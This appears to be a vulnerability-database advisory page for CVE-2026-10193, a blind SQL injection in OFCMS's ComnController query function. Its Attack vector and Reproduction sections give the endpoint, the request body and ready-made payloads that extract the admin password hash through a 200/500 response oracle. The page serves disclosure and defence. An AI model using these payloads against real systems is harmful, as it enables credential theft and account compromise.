CVE-2026-10193
Description
OFCMS up to 1.1.3 contains an SQL injection in the ComnController query function via the field parameter, allowing remote blind exploitation.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
OFCMS up to 1.1.3 contains an SQL injection in the ComnController query function via the field parameter, allowing remote blind exploitation.
Vulnerability
The open-source content management system OFCMS, up to version 1.1.3, contains an SQL injection vulnerability in the ComnController component. The flaw resides in the Java file ofcms-admin/src/main/java/com/ofsoft/cms/admin/controller/ComnController.java within the query() method. When the sqlid parameter equals system.user.query, the backend SQL query is dynamically built by directly concatenating the field and sort parameters from user input into the ORDER BY clause without proper sanitization [1]. This allows an authenticated attacker with backend access to perform injection.
Exploitation
An attacker must first authenticate to the OFCMS backend. With valid credentials, they can send HTTP requests to the vulnerable query endpoint, controlling the field and sort parameters. The official advisory [1] demonstrates exploitation by crafting a complex expression in the field parameter that includes nested subqueries with Boolean logic, enabling blind extraction of database contents. The exploit requires knowledge of the backend SQL structure but no special network position beyond network access to the application.
Impact
Successful exploitation allows an authenticated attacker to extract arbitrary data from the database, including sensitive information such as user passwords. The advisory [1] confirms reading a user's password hash. This constitutes a breach of confidentiality and could lead to further privilege escalation or account compromise.
Mitigation
As of publication, the OFCMS project has not responded to the issue report and no patched version has been released [1]. Users are advised to restrict network access to the backend, monitor for suspicious queries, and apply strict input validation on the field and sort parameters as a temporary workaround until an official fix is provided. The vulnerability is not currently listed on CISA's Known Exploited Vulnerabilities (KEV) catalog.
AI Insight generated on May 31, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
1Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"The `field` parameter is directly concatenated into the `ORDER BY` clause of the SQL query without any sanitization or whitelist validation."
Attack vector
An authenticated attacker with backend access sends a POST request to `/ofcms_admin/admin/comn/service/query.json` with `sqlid=system.user.query` and a malicious `field` parameter. Because the `field` value is directly interpolated into the `ORDER BY` clause without sanitization, the attacker can inject SQL expressions such as `if(LeNgth((select/**/user_password/**/from/**/of_sys_user/**/where/**/user_id=1))=X,u.user_id,(select/**/1/**/union/**/select/**/2))`. The server's response (200 vs. 500) acts as an oracle, enabling blind extraction of arbitrary data. [ref_id=1]
Affected code
The vulnerability resides in `ComnController.java` (`ofcms-admin/src/main/java/com/ofsoft/cms/admin/controller/ComnController.java`), specifically in the `query()` method at line 33-34. The `field` and `sort` parameters are passed unsanitized into `Db.getSqlPara()`, which loads the SQL template from `system/user.sql` and directly concatenates these values into the `ORDER BY` clause. [ref_id=1]
What the fix does
No official patch has been released by the project maintainer. The advisory recommends two mitigations: (1) filter or validate all user-supplied input before it reaches the SQL query, and (2) implement a whitelist of allowed sort/field values so that only predefined column names can be appended to the `ORDER BY` clause. Without such controls, the `field` parameter remains a direct injection vector. [ref_id=1]
Preconditions
- authAttacker must have valid backend credentials and a session cookie.
- networkThe application must be reachable over the network.
- inputThe `field` parameter is attacker-controlled and unsanitized.
Reproduction
1. Log in to the OFCMS backend and capture the session cookie. 2. Send a POST request to `/ofcms_admin/admin/comn/service/query.json` with `Content-Type: application/x-www-form-urlencoded`. 3. Set the body to `sqlid=system.user.query&pageNum=1&pageSize=10&field=if(LeNgth((select/**/user_password/**/from/**/of_sys_user/**/where/**/user_id=1))=X,u.user_id,(select/**/1/**/union/**/select/**/2))&sort=asc`, iterating `X` from 1 to 250. 4. A 200 response indicates the guessed length is correct; a 500 response indicates it is wrong. 5. For character extraction, use `field=if((select/**/ascii(substr(user_password,X,1))/**/from/**/of_sys_user/**/where/**/user_id=1)=Y,u.user_id,(select/**/1/**/union/**/select/**/2))` and iterate `X` (position) and `Y` (ASCII value). [ref_id=1]
Generated on May 31, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
5News mentions
0No linked articles in our index yet.